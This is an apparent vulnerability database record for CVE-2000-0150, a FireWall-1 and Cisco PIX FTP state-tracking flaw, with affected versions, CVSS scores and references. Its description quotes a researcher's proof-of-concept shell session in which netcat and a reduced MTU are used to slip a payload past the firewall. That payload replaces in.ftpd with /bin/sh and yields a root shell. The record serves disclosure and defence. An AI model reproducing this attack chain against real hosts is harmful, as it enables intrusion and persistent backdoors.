Details of VAR-200002-0050

ID

VAR-200002-0050

CVE

CVE-2000-0150

TITLE

Multiple vendors' firewalls do not adequately keep state of FTP traffic

Trust: 0.8

sources: CERT/CC: VU#328867

DESCRIPTION

Check Point Firewall-1 allows remote attackers to bypass port access restrictions on an FTP server by forcing it to send malicious packets that Firewall-1 misinterprets as a valid 227 response to a client's PASV attempt. Firewalls and other systems that inspect FTP application layer traffic may not adequately maintain the state of FTP commands and responses. As a result, an attacker could establish arbitrary TCP connections to FTP servers or clients located behind a vulnerable firewall. A vulnerability exists in the way that Checkpoint FireWall-1 handles packets sent from an FTP server to a connecting client. An attacker may be able to exploit this weakness to establish connections to any machine residing behind a FireWall-1 machine, or send packets in to a network protected by a FireWall-1. FireWall-1 monitors packets from the FTP server to the client, looking for the string "227 " at the beginning of each packet. If FW-1 finds a packet which matches this criteria, it will extract the destination address and port, verify that the specified destination address matches the source of the packet, and allow TCP connections through the firewall to the destination IP and port. In FireWall-1 4.0, these TCP connections can only send data in one direction. Under FireWall-1 3.0 and prior, this limitation does not exist. In addition, under FW-1 4.0 the data cannot be travelling to a port that is defined in FW-1's list of well known TCP services. The details of the vulnerability posted by John McDonald <jm@dataprotect.com> contained the following example: "Here is an example of an attack based on this technique. There is a FireWall-1 machine between gumpe and the 172.16.0.2 server, which only permits incoming FTP connections. 172.16.0.2 is a default Solaris 2.6 install, with the Tooltalk Database vulnerability. We send the datagram directly to the service's TCP port, in spite of this port being blocked by the firewall. Note that since there is no response expected, the one-way restriction doesn't affect this attack. All of our testing was done on a Nokia IPSO machine running FW-1 version 4.0.SP-4. [root@gumpe /root]# strings hackfile localhost """"3333DDDD/bin/ksh.-c.cp /usr/sbin/in.ftpd /tmp/in.ftpd.back ; rm -f /usr/sbin/in.ftpd ; cp /bin/sh /usr/sbin/in.ftpd [root@gumpe /root]# /sbin/ifconfig eth0 mtu 100 [root@gumpe /root]# nc -vvv 172.16.0.2 21 172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 21 (?) open 220 sol FTP server (SunOS 5.6) ready. ...........................................227 (172,16,0,2,128,7) 500 '........................................... [1]+ Stopped nc -vvv 172.16.0.2 21 [root@gumpe /root]# cat killfile | nc -vv 172.16.0.2 32775 172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 32775 (?) open sent 80, rcvd 0 [root@gumpe /root]# nc -vvv 172.16.0.2 21 172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 21 (?) open 220 sol FTP server (SunOS 5.6) ready. ...........................................227 (172,16,0,2,128,7) 500 '........................................... [2]+ Stopped nc -vvv 172.16.0.2 21 [root@gumpe /root]# cat hackfile | nc -vv 172.16.0.2 32775 172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 32775 (?) open sent 1168, rcvd 0 [root@gumpe /root]# nc -vvv 172.16.0.2 21 172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 21 (?) open id uid=0(root) gid=0(root) There is an easier way to perform a similar attack on this setup, since the default Solaris FTP daemon allows a bounce attack, but this should suffice to demonstrate the potential severity of this problem." In summary, if a network has an FTP server accesible behind a FireWall-1 firewall, that they allow the outside world access to, it may be possible for an attacker to open TCP connections to certain ports on that FTP machine. This vulnerability is not specific to Firewall-1. It has been demonstrated that the PIX firewall, from Cisco, is also vulnerable. Check Point Firewall-1 is vulnerable

Trust: 1.98

sources: NVD: CVE-2000-0150 // CERT/CC: VU#328867 // BID: 979 // VULHUB: VHN-1729

AFFECTED PRODUCTS

vendor:	checkpoint	model:	firewall-1	scope:	eq	version:	4.0	Trust: 1.6
vendor:	checkpoint	model:	firewall-1	scope:	eq	version:	3.0	Trust: 1.6
vendor:	cisco	model:	pix firewall software	scope:	eq	version:	4.2\(2\)	Trust: 1.0
vendor:	cisco	model:	pix firewall software	scope:	eq	version:	4.1\(6\)	Trust: 1.0
vendor:	cisco	model:	pix firewall software	scope:	eq	version:	4.4\(4\)	Trust: 1.0
vendor:	cisco	model:	pix firewall software	scope:	eq	version:	5.0	Trust: 1.0
vendor:	cisco	model:	pix firewall software	scope:	eq	version:	4.1\(6b\)	Trust: 1.0
vendor:	cisco	model:	pix firewall software	scope:	eq	version:	4.3	Trust: 1.0
vendor:	cisco	model:	pix firewall software	scope:	eq	version:	4.2\(1\)	Trust: 1.0
vendor:	ip filter	model:	-	scope:	-	version:	-	Trust: 0.8
vendor:	netbsd	model:	-	scope:	-	version:	-	Trust: 0.8
vendor:	watchguard	model:	-	scope:	-	version:	-	Trust: 0.8
vendor:	cisco	model:	pix firewall	scope:	eq	version:	5.0	Trust: 0.3
vendor:	cisco	model:	pix firewall	scope:	eq	version:	4.4(4)	Trust: 0.3
vendor:	cisco	model:	pix firewall	scope:	eq	version:	4.3	Trust: 0.3
vendor:	cisco	model:	pix firewall	scope:	eq	version:	4.2.2	Trust: 0.3
vendor:	cisco	model:	pix firewall	scope:	eq	version:	4.2.1	Trust: 0.3
vendor:	cisco	model:	pix firewall b	scope:	eq	version:	4.1.6	Trust: 0.3
vendor:	cisco	model:	pix firewall	scope:	eq	version:	4.1.6	Trust: 0.3
vendor:	check	model:	point software firewall-1	scope:	eq	version:	4.0	Trust: 0.3
vendor:	check	model:	point software firewall-1	scope:	eq	version:	3.0	Trust: 0.3
vendor:	cisco	model:	pix firewall	scope:	ne	version:	5.1	Trust: 0.3

sources: CERT/CC: VU#328867 // BID: 979 // CNNVD: CNNVD-200002-044 // NVD: CVE-2000-0150

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2000-0150
value:	HIGH
Trust: 1.0
CARNEGIE MELLON:	VU#328867
value:	24.10
Trust: 0.8
CNNVD:	CNNVD-200002-044
value:	HIGH
Trust: 0.6
VULHUB:	VHN-1729
value:	HIGH
Trust: 0.1

nvd@nist.gov:	CVE-2000-0150
severity:	HIGH
baseScore:	7.5
vectorString:	AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	PARTIAL
availabilityImpact:	PARTIAL
exploitabilityScore:	10.0
impactScore:	6.4
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.0
VULHUB:	VHN-1729
severity:	HIGH
baseScore:	7.5
vectorString:	AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	PARTIAL
availabilityImpact:	PARTIAL
exploitabilityScore:	10.0
impactScore:	6.4
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.1

sources: CERT/CC: VU#328867 // VULHUB: VHN-1729 // CNNVD: CNNVD-200002-044 // NVD: CVE-2000-0150

PROBLEMTYPE DATA

problemtype:

NVD-CWE-Other

Trust: 1.0

sources: NVD: CVE-2000-0150

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-200002-044

TYPE

Design Error

Trust: 0.9

sources: BID: 979 // CNNVD: CNNVD-200002-044

EXTERNAL IDS

db:	CERT/CC	id:	VU#328867	Trust: 2.5
db:	BID	id:	979	Trust: 2.0
db:	NVD	id:	CVE-2000-0150	Trust: 1.7
db:	OSVDB	id:	4417	Trust: 1.7
db:	CNNVD	id:	CNNVD-200002-044	Trust: 0.6
db:	VULHUB	id:	VHN-1729	Trust: 0.1

sources: CERT/CC: VU#328867 // VULHUB: VHN-1729 // BID: 979 // CNNVD: CNNVD-200002-044 // NVD: CVE-2000-0150

REFERENCES

url:	http://www.securityfocus.com/bid/979	Trust: 1.7
url:	http://www.kb.cert.org/vuls/id/328867	Trust: 1.7
url:	http://www.osvdb.org/4417	Trust: 1.7
url:	http://www.ietf.org/rfc/rfc959.txt	Trust: 0.8
url:	http://www.ietf.org/rfc/rfc2581.txt	Trust: 0.8
url:	http://online.securityfocus.com/archive/1/47688/2000-02-12/2000-02-18/1	Trust: 0.8
url:	http://online.securityfocus.com/archive/82/45758/2000-02-08/2000-02-14/1	Trust: 0.8
url:	http://www.checkpoint.com/techsupport/	Trust: 0.3
url:	http://www.cisco.com/warp/public/707/sec_incident_response.shtml	Trust: 0.3
url:	-	Trust: 0.1

sources: CERT/CC: VU#328867 // VULHUB: VHN-1729 // BID: 979 // CNNVD: CNNVD-200002-044 // NVD: CVE-2000-0150

CREDITS

This vulnerability was posted to the Bugtraq mailing list on February 9, 2000 by John McDonald <jm@dataprotect.com>. It contained a set of work developed by both McDonald and Thomas Lopatic <tl@dataprotect.com>

Trust: 0.9

sources: BID: 979 // CNNVD: CNNVD-200002-044

SOURCES

db:	CERT/CC	id:	VU#328867
db:	VULHUB	id:	VHN-1729
db:	BID	id:	979
db:	CNNVD	id:	CNNVD-200002-044
db:	NVD	id:	CVE-2000-0150

LAST UPDATE DATE

2024-08-14T14:29:35.812000+00:00

SOURCES UPDATE DATE

db:	CERT/CC	id:	VU#328867	date:	2003-03-07T00:00:00
db:	VULHUB	id:	VHN-1729	date:	2018-10-30T00:00:00
db:	BID	id:	979	date:	2000-02-09T00:00:00
db:	CNNVD	id:	CNNVD-200002-044	date:	2006-11-16T00:00:00
db:	NVD	id:	CVE-2000-0150	date:	2018-10-30T16:26:17.700

SOURCES RELEASE DATE

db:	CERT/CC	id:	VU#328867	date:	2002-10-08T00:00:00
db:	VULHUB	id:	VHN-1729	date:	2000-02-12T00:00:00
db:	BID	id:	979	date:	2000-02-09T00:00:00
db:	CNNVD	id:	CNNVD-200002-044	date:	2000-02-12T00:00:00
db:	NVD	id:	CVE-2000-0150	date:	2000-02-12T05:00:00